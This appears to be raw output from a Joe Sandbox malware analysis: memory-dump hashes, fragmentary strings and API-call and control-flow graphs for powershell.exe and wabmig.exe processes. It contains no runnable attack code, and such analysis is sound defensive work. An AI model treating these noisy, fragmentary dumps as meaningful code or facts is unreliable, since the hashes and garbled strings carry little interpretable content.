                                        • Instruction ID: cef9122c8a893be99ad1d84e8656913e807cca8d75e756ab0a63fe9191901873
                                        • Opcode Fuzzy Hash: 9d6218bba46fa7949317167aaaeaa242807f1654c7b97515bf74a83fff39eb87
                                        • Instruction Fuzzy Hash: 0E51D2B4A00114DFE724CB98C584B6DBBB2EF84304F2185A9E515AF392CB71EC66DF41
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e30f241fcb02925ebb83317996b0fa2d49165675c93fcc34133f75f7f033c24
                                        • Instruction ID: a5835436eafbb739673eca621b86f5e94d51d79c1bae5b915bb24afb58cc319e
                                        • Opcode Fuzzy Hash: 7e30f241fcb02925ebb83317996b0fa2d49165675c93fcc34133f75f7f033c24
                                        • Instruction Fuzzy Hash: DE418F317082048FDB15DB34C8586EEBBB2EFCA750F194169E416EB3A1CB359D41DB90
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c6e4ccba0b4283660bd07495ba701872ae196beb0ff12b630f6b1eb18c411a7
                                        • Instruction ID: b1186f68907b403773dd608501fcea9f6a6aa0331623d82b1513717b5ffb1df5
                                        • Opcode Fuzzy Hash: 7c6e4ccba0b4283660bd07495ba701872ae196beb0ff12b630f6b1eb18c411a7
                                        • Instruction Fuzzy Hash: EB315BF57001258BCB249B7888403AFB7A5EFC8315F10897AD80ADB780DB32DA62D790
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bef473a517c1eae70b0886a4440fa601be17cdecd004c96cc50fc19213988445
                                        • Instruction ID: f8e6174ed04414c3c1a63e022fa1e47f281b2d2ac6cd30768486fb3f0d8ddb72
                                        • Opcode Fuzzy Hash: bef473a517c1eae70b0886a4440fa601be17cdecd004c96cc50fc19213988445
                                        • Instruction Fuzzy Hash: 1C417270A042089FDB14DFA5C8947DEBBF2BFC9300F148569D016AB7A1DB71AD85DB90
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 091aa4ad222c35fa82a86ed769d1c8f325b766fa4f04a88a9d4fa44e17bf109d
                                        • Instruction ID: a1257be19c3c192e2da72243e2c0394df66d8ed614d5a1a5deccc39eaaaa58fe
                                        • Opcode Fuzzy Hash: 091aa4ad222c35fa82a86ed769d1c8f325b766fa4f04a88a9d4fa44e17bf109d
                                        • Instruction Fuzzy Hash: 99412678A002099FCB05CF59C4949EEFBB1FF49310B258259C915AB365C732FDA1CBA4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bf11ea9df0181a12ba441e0c6b6ae9421c2bbda67bf19cd163f91ed2d645a0b
                                        • Instruction ID: a3ccf6807d139b357e7b63ca4d898dc557c0c774bc7b9ce8de03da0ba72d0078
                                        • Opcode Fuzzy Hash: 4bf11ea9df0181a12ba441e0c6b6ae9421c2bbda67bf19cd163f91ed2d645a0b
                                        • Instruction Fuzzy Hash: 1E3148F2B04020CBD72557AC99116AFB7929FD5318F10886ADA029B780DF32DD5697E2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ca3abd9142f2076580be9bef230d70f3d923062e285908ea1ba6d92b9d42705
                                        • Instruction ID: d586e85e1334fc1db728d1f701ce20e70f82a7ba1f14022e433ac62a77fada5d
                                        • Opcode Fuzzy Hash: 5ca3abd9142f2076580be9bef230d70f3d923062e285908ea1ba6d92b9d42705
                                        • Instruction Fuzzy Hash: B7218EB17003697BDB349AB98841B37B69AABC5305F34843AE506CB3C4CF76D852B365
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a0420d863ac8277a1570dde252c3feaeb498dedec690a64ac367c5f2a1c4e0e
                                        • Instruction ID: 0093c24167a91d6a638c1db9018a7a685ac2f2565b5495cd37f41836a88cbd5e
                                        • Opcode Fuzzy Hash: 1a0420d863ac8277a1570dde252c3feaeb498dedec690a64ac367c5f2a1c4e0e
                                        • Instruction Fuzzy Hash: DA31AF70A093959FCB02DF68C8A09EABFB0FF4A310B198197D445DB392C634ED45CBA1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb5ca9d8f438970d5e2aac25ace68a789a401e0497151ba19073b4a964c8ee24
                                        • Instruction ID: de23e862eb0697dcd32374612faad5afaf89b63c7a22f3978302480c1a0aa97b
                                        • Opcode Fuzzy Hash: fb5ca9d8f438970d5e2aac25ace68a789a401e0497151ba19073b4a964c8ee24
                                        • Instruction Fuzzy Hash: 7D21BBB13043E96FEB214B798840B733F669FC6304F388426E441CB2C6CA39D8A1A361
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94f5bb4e01b1057c79249261c0b4acbbb8981fb3d9e236c4520fe7e3430a621f
                                        • Instruction ID: ebf1cb017aa97d33869fa0d3a549555796119be00a074cf74eabde3a3e7923ea
                                        • Opcode Fuzzy Hash: 94f5bb4e01b1057c79249261c0b4acbbb8981fb3d9e236c4520fe7e3430a621f
                                        • Instruction Fuzzy Hash: BA1127B27000219BD710966DA8413AEF7529BC1314F10C47AEA02DB7D1DF32D822D791
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b441b891f4e94b3b2171dbb58b0138bf954be596b69dd3776e30d072c30417a5
                                        • Instruction ID: be9fe4357806113adb382e86e939f88aa797d3773f90a949b4e4caf3366aea44
                                        • Opcode Fuzzy Hash: b441b891f4e94b3b2171dbb58b0138bf954be596b69dd3776e30d072c30417a5
                                        • Instruction Fuzzy Hash: 5A210D74A042099FCB00DF99D8909AEFBB5FF89310B1581A5E909EB352C731FD41DBA1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_c10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df73f2b8b5fa9f525554437e8668a4fc54640d069faf004abf2335ef13cfcfd5
                                        • Instruction ID: 5e31e667b1d507892be4796fcc121a28d4a78d4e68610930157f19d2f0c3804d
                                        • Opcode Fuzzy Hash: df73f2b8b5fa9f525554437e8668a4fc54640d069faf004abf2335ef13cfcfd5
                                        • Instruction Fuzzy Hash: 9C111330C00108CBCF24DAE4D5893ECB7B2AF5231AF241029D821F20A1EB749ECAEB11
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_97d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c84f6ce4303db6ece56a87dc08c3e753fb958b822a344422e0989059c303567
                                        • Instruction ID: 6c9d260d17f2edca20c19d4f21925a91008e475f05692b136f2cd582eaff2ad2
                                        • Opcode Fuzzy Hash: 7c84f6ce4303db6ece56a87dc08c3e753fb958b822a344422e0989059c303567
                                        • Instruction Fuzzy Hash: 5101F2B240A3409EEB208A29CCC0B66BFBCDF51324F18D81AED4C4B242C6799941C6B1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_97d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5995d1d6963aa45d879ec3bd3fff61e0d47a15e82d12543a1aa86d1feebddc9
                                        • Instruction ID: a0325d5f78fb6b8ff4b13558fb15ef0b5e967fff48c5983985dbd0f0e3fe15fd
                                        • Opcode Fuzzy Hash: d5995d1d6963aa45d879ec3bd3fff61e0d47a15e82d12543a1aa86d1feebddc9
                                        • Instruction Fuzzy Hash: 97F0C272406344AEE7108A15CDC4B62FFACEF51334F18C15AED4C4B286C2799840CBB1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a73b4c4812f561af63ffd0f2aa7a91a0b50b54fa3684c376f7135c0d1530d9ec
                                        • Instruction ID: 9548e0481dcf6977cb99b1e0ffbed4be638f597f18635a5027aab4ea3a44a086
                                        • Opcode Fuzzy Hash: a73b4c4812f561af63ffd0f2aa7a91a0b50b54fa3684c376f7135c0d1530d9ec
                                        • Instruction Fuzzy Hash: 22B012302000408BD341D714CC50B20BB509F83204F18C0C8E404CF252CB33DC03C780
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_97d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f3e1713df45e449361ce40ac7121b094c04ea2665e09089d2ea0c8b925609da
                                        • Instruction ID: b8ecd0b7c590d3fa80a4fd548d618acc1c50a5148ed9477510f07ba3d1dbe3a1
                                        • Opcode Fuzzy Hash: 7f3e1713df45e449361ce40ac7121b094c04ea2665e09089d2ea0c8b925609da
                                        • Instruction Fuzzy Hash: B92102B26092009FDB04DF14D580B2ABBB9FF94724F24C96DD90E4B641C37AD806C662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$tPfq$tPfq$tPfq$$fq$(lq$(lq$(lq$(lq
                                        • API String ID: 0-2114525439
                                        • Opcode ID: e7a4b8ef9e69a7a82c91300d1b5f7b1603cf4c882f1d7625c105821aebab94d0
                                        • Instruction ID: 0c600f21ce4114145f5bb8e87e99d27017b8ff29d5ca6a45d2c9517ca79763de
                                        • Opcode Fuzzy Hash: e7a4b8ef9e69a7a82c91300d1b5f7b1603cf4c882f1d7625c105821aebab94d0
                                        • Instruction Fuzzy Hash: E1A137B0700226AFDB258F58C94576BBBB6EF85310F548459E805AB2C1CB31DC57EBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$$fq
                                        • API String ID: 0-3516216882
                                        • Opcode ID: 6f7f2601fd39f591520f3ed423487271bd1a89402e95d591e863d0772c95d296
                                        • Instruction ID: 205a0f74814dfd524c0a0b7d72a89fc4f28624322e4b2391871689d80c9bb376
                                        • Opcode Fuzzy Hash: 6f7f2601fd39f591520f3ed423487271bd1a89402e95d591e863d0772c95d296
                                        • Instruction Fuzzy Hash: 5F7137B5B10266DFCB299F69C45967ABBA2AFC4700F148469E8018B3C0DF31DC5ADB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-3165298016
                                        • Opcode ID: 20ac1c978fc09298cdfeedfa89706b77527ff715586da68040ea38515604bf82
                                        • Instruction ID: c53b0f4a11ca7d25f0c7948768d261edd159df3a9b849fc7455b63160e974119
                                        • Opcode Fuzzy Hash: 20ac1c978fc09298cdfeedfa89706b77527ff715586da68040ea38515604bf82
                                        • Instruction Fuzzy Hash: 77512AF1B00125DFDF298B69C95166ABBA2AF85310F25C069DD468B2C1CF31D863EB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$tPfq$tPfq$(lq$(lq$(lq$(lq
                                        • API String ID: 0-4156688077
                                        • Opcode ID: 1f6afd909af3d1835189c30045cc8df501dcf9cb79daa87b2239a70389a19a5e
                                        • Instruction ID: 95912220539dddd528909edac0fc73b78340ad1e8fd9cb8a7505f7d6550cf932
                                        • Opcode Fuzzy Hash: 1f6afd909af3d1835189c30045cc8df501dcf9cb79daa87b2239a70389a19a5e
                                        • Instruction Fuzzy Hash: D03127B1B001259FDB288F588910B6B7BB7AF89710F258459E9016B3C0CB31EC53A7E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq
                                        • API String ID: 0-4070656019
                                        • Opcode ID: 0133fd6051421b34f29d41a0f4367e2e34583168240cef09159f594f81c5d0f5
                                        • Instruction ID: fd24631cf7fe9a2e6b926fd7e2954cbcfcf45d7edcfca4a6cb1e4ae6b83908ef
                                        • Opcode Fuzzy Hash: 0133fd6051421b34f29d41a0f4367e2e34583168240cef09159f594f81c5d0f5
                                        • Instruction Fuzzy Hash: BC614CB1B002558FDB294B79841167B7BA2AFCA310F24816AD546CB3D1DF31C892D7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-1793556278
                                        • Opcode ID: 4b378866e7815c2eb0905a875a80341b76b4763499d530c1de7e17db99098d72
                                        • Instruction ID: 04fc0dbfc3c5b4471c2796c8157cd630cea0d54449db3ba6cdeed6dea9ba04e7
                                        • Opcode Fuzzy Hash: 4b378866e7815c2eb0905a875a80341b76b4763499d530c1de7e17db99098d72
                                        • Instruction Fuzzy Hash: 01612AB17242299FCB198F79E4006AB7BA6AFC1311F14C06ED485CB2D1CB71C962E7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: XRkq$XRkq$XRkq$tPfq$tPfq$$fq
                                        • API String ID: 0-197451711
                                        • Opcode ID: 1ba0ed50f349c5ab19ab70d3086f663f045e13064af676ab32f9767dafd8ed97
                                        • Instruction ID: 5a504b09716a1e8671cd701dea707d24a259694907a4f016b0a88dc30d8a7bca
                                        • Opcode Fuzzy Hash: 1ba0ed50f349c5ab19ab70d3086f663f045e13064af676ab32f9767dafd8ed97
                                        • Instruction Fuzzy Hash: 0C6128B1B002269FDB259F68844166ABBB6AF85710F24C469E8419F3C1CF31DC57DBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: tPfq$tPfq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-364545437
                                        • Opcode ID: e15eb3e8ba9e5a5e956e0274d5ba3ba46bc115d1b085370ae3eac46e9ade7df1
                                        • Instruction ID: 657482f726bc61d1f3629cd52877b6089ccc89639c0165647f1b741d53d2a2ae
                                        • Opcode Fuzzy Hash: e15eb3e8ba9e5a5e956e0274d5ba3ba46bc115d1b085370ae3eac46e9ade7df1
                                        • Instruction Fuzzy Hash: 33515BB17143669FDB354B79C841B77BBA6EF82320F24847AD6458B2D1CB31C862D391
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                        • API String ID: 0-3759051638
                                        • Opcode ID: dc236f6a8a27462c109fca433885b51a09efa835f3ca04a3c39436b699881edb
                                        • Instruction ID: 6c5501eeaefad2103443195320710711937309e5ff17ec3bd002626b34668359
                                        • Opcode Fuzzy Hash: dc236f6a8a27462c109fca433885b51a09efa835f3ca04a3c39436b699881edb
                                        • Instruction Fuzzy Hash: 1F4169B1B002169FCB265F7484107BA7BB2DFC9210F14816AD945CB6C1DF32C993E7A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                                        • API String ID: 0-3104067135
                                        • Opcode ID: a3db66e90bd98000c75b5402f56cde8ddec4145bdd3c6a7965fa2a660eb8a50e
                                        • Instruction ID: fb7a24dc68f965f0f70cf91ed569e48a00f1895d285e5f07893fb7c051494f2a
                                        • Opcode Fuzzy Hash: a3db66e90bd98000c75b5402f56cde8ddec4145bdd3c6a7965fa2a660eb8a50e
                                        • Instruction Fuzzy Hash: 6631B3B4B00225DFDB28DF58C455A5ABBB2BF88710F158559E805AB380CB31EC16DBD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq
                                        • API String ID: 0-2113499236
                                        • Opcode ID: 1c147d6328db6ca8e65fc4d441cde65951af5c26bd7378cbc3c975cc406fc15b
                                        • Instruction ID: c2e98a165f7cbe2ed3211d8b5df8ca5d0ea3a19ff34ff1ff6ed30569b0849d13
                                        • Opcode Fuzzy Hash: 1c147d6328db6ca8e65fc4d441cde65951af5c26bd7378cbc3c975cc406fc15b
                                        • Instruction Fuzzy Hash: D3218EB13003665BDB74467D884076776DAABC0B14F24842AE48AEB3C1CF71E852A361
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$$fq$$fq
                                        • API String ID: 0-2206495126
                                        • Opcode ID: 9171e9e86916da347e0e0d798f98769f31c91950bb58cc74b9e19faf037a8ab7
                                        • Instruction ID: 949e8130114b1b4a30e1df1a608b6ab8eb4573c3c383df2c91bcb1442fd7a984
                                        • Opcode Fuzzy Hash: 9171e9e86916da347e0e0d798f98769f31c91950bb58cc74b9e19faf037a8ab7
                                        • Instruction Fuzzy Hash: 1D0126627092E54FC73B033818202A26FB25FC755072A81EBC185DBBC3CA218C179393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_7120000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'fq$4'fq$$fq$$fq
                                        • API String ID: 0-2206495126
                                        • Opcode ID: dfd2c6acfa4b32531fff932fbf1b97b84c357c157395c19d5bbe499998b45fee
                                        • Instruction ID: bc7f638f1de5ee593acae9f241bb79359c79e62adede54fcd6db4ab61a668b02
                                        • Opcode Fuzzy Hash: dfd2c6acfa4b32531fff932fbf1b97b84c357c157395c19d5bbe499998b45fee
                                        • Instruction Fuzzy Hash: 390192F27001599BCB1E8E69945066EBBBBBF86250B37C05ACC048B2D4CB35CC63A756

                                        Execution Graph

                                        Execution Coverage:11.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:38
                                        Total number of Limit Nodes:7
                                        execution_graph 43327 26933210 43328 26933256 GetCurrentProcess 43327->43328 43330 269332a1 43328->43330 43331 269332a8 GetCurrentThread 43328->43331 43330->43331 43332 269332e5 GetCurrentProcess 43331->43332 43333 269332de 43331->43333 43335 2693331b 43332->43335 43333->43332 43334 26933343 GetCurrentThreadId 43336 26933374 43334->43336 43335->43334 43337 2693d7f0 43338 2693d858 CreateWindowExW 43337->43338 43340 2693d914 43338->43340 43340->43340 43341 26d0848 43343 26d084e 43341->43343 43342 26d091b 43343->43342 43346 26d144a 43343->43346 43351 26d1342 43343->43351 43347 26d1356 43346->43347 43348 26d1440 43347->43348 43350 26d144a 2 API calls 43347->43350 43357 26d7e71 43347->43357 43348->43343 43350->43347 43352 26d12fe 43351->43352 43354 26d134b 43351->43354 43352->43343 43353 26d1440 43353->43343 43354->43353 43355 26d144a 2 API calls 43354->43355 43356 26d7e71 2 API calls 43354->43356 43355->43354 43356->43354 43358 26d7e7b 43357->43358 43359 26d7f31 43358->43359 43362 2695fa18 43358->43362 43366 2695fa28 43358->43366 43359->43347 43364 2695fa28 43362->43364 43363 2695fc52 43363->43359 43364->43363 43365 2695fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 43364->43365 43365->43364 43368 2695fa3d 43366->43368 43367 2695fc52 43367->43359 43368->43367 43369 2695fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 43368->43369 43369->43368 43370 26933458 DuplicateHandle 43371 269334ee 43370->43371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-1582559945
                                        • Opcode ID: dfc44bfed6baaf02d003d2d24c52ca37b183670e90368aca6943657e61942669
                                        • Instruction ID: 3e5c1657b7e8ac58b9a2c7d14d511c3bf5557312aed7d57658da9f78abe57eb9
                                        • Opcode Fuzzy Hash: dfc44bfed6baaf02d003d2d24c52ca37b183670e90368aca6943657e61942669
                                        • Instruction Fuzzy Hash: 81E22834E002098FCB14DF68C594A9DB7B6FF89310F6585A9E409AB365EB34ED85CF80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-1582559945
                                        • Opcode ID: 2ed1aee5901d4c48a59cb958e9378d6dd5a956e8da798345aab0feec32026b16
                                        • Instruction ID: e3efd61e52af9a0bd798bbae345b1d4e369622a34ec6703ad1458a9f651758c0
                                        • Opcode Fuzzy Hash: 2ed1aee5901d4c48a59cb958e9378d6dd5a956e8da798345aab0feec32026b16
                                        • Instruction Fuzzy Hash: 6D5241B0E102098BDB14CF68C5A079EB7B6EB45310F21856AF516EB399DF34DD81CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2317 26957e40-26957e5e 2318 26957e60-26957e63 2317->2318 2319 26957e65-26957e7f 2318->2319 2320 26957e84-26957e87 2318->2320 2319->2320 2321 26957e89-26957ea5 2320->2321 2322 26957eaa-26957ead 2320->2322 2321->2322 2323 26957ec4-26957ec7 2322->2323 2324 26957eaf-26957ebd 2322->2324 2327 26957ed4-26957ed6 2323->2327 2328 26957ec9-26957ed3 2323->2328 2334 26957ee6-26957efc 2324->2334 2335 26957ebf 2324->2335 2329 26957edd-26957ee0 2327->2329 2330 26957ed8 2327->2330 2329->2318 2329->2334 2330->2329 2337 26958117-26958121 2334->2337 2338 26957f02-26957f0b 2334->2338 2335->2323 2339 26957f11-26957f2e 2338->2339 2340 26958122-26958157 2338->2340 2349 26958104-26958111 2339->2349 2350 26957f34-26957f5c 2339->2350 2343 26958159-2695815c 2340->2343 2344 26958391-26958394 2343->2344 2345 26958162-26958171 2343->2345 2347 269583b7-269583ba 2344->2347 2348 26958396-269583b2 2344->2348 2358 26958190-269581d4 2345->2358 2359 26958173-2695818e 2345->2359 2352 26958465-26958467 2347->2352 2353 269583c0-269583cc 2347->2353 2348->2347 2349->2337 2349->2338 2350->2349 2370 26957f62-26957f6b 2350->2370 2354 2695846e-26958471 2352->2354 2355 26958469 2352->2355 2361 269583d7-269583d9 2353->2361 2354->2343 2360 26958477-26958480 2354->2360 2355->2354 2371 26958365-2695837a 2358->2371 2372 269581da-269581eb 2358->2372 2359->2358 2366 269583f1-269583f5 2361->2366 2367 269583db-269583e1 2361->2367 2368 269583f7-26958401 2366->2368 2369 26958403 2366->2369 2373 269583e5-269583e7 2367->2373 2374 269583e3 2367->2374 2376 26958408-2695840a 2368->2376 2369->2376 2370->2340 2377 26957f71-26957f8d 2370->2377 2371->2344 2382 269581f1-2695820e 2372->2382 2383 26958350-2695835f 2372->2383 2373->2366 2374->2366 2379 2695840c-2695840f 2376->2379 2380 2695841b-26958454 2376->2380 2386 26957f93-26957fbd 2377->2386 2387 269580f2-269580fe 2377->2387 2379->2360 2380->2345 2399 2695845a-26958464 2380->2399 2382->2383 2393 26958214-2695830a call 26956670 2382->2393 2383->2371 2383->2372 2400 26957fc3-26957feb 2386->2400 2401 269580e8-269580ed 2386->2401 2387->2349 2387->2370 2449 2695830c-26958316 2393->2449 2450 26958318 2393->2450 2400->2401 2407 26957ff1-2695801f 2400->2407 2401->2387 2407->2401 2413 